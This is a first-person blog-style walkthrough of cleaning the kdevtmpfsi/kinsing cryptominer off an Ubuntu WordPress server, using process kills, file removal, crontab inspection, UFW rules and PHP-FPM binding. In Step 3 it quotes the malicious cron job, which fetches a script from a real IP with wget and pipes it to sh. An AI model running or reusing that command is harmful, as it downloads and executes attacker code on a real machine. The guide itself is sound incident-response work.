My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:
$ top -iI noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:
Step 1: Kill the kdevtmpfsi and kinsing Processes
First, find the process ID (PID) for kdevtmpfsi and kill it:
$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9Next, find the PID for kinsing and kill it:
$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9Step 2: Find and Remove the Malicious Program Files
Now, search for and remove any files associated with kdevtmpfsi and kinsing:
$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;The output should look like this:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'Step 3: Check for Scheduled Tasks Set by www-data User
The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:
$ sudo crontab -l -u www-dataI found the following task:
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:
$ sudo crontab -r -u www-dataThen, I deleted the unk.sh script:
$ sudo find / -iname unk.sh -exec rm -fv {} \;Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing
To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:
$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsingThis ensures that these files are no longer executable and cannot run.
Step 5: Enable UFW Firewall and Block Malicious IP
I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:
$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197To check the UFW status:
$ sudo ufw status numberedStep 6: Restrict PHP-FPM to Localhost
According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:
$ sudo vim /etc/php/8.3/fpm/pool.d/www.confI changed the following line:
listen = 9000to:
listen = 127.0.0.1:9000This restricts php-fpm to only listen on the local 127.0.0.1 IP address. To apply the changes, I restarted the php-fpm service:
$ sudo systemctl restart php8.3-fpm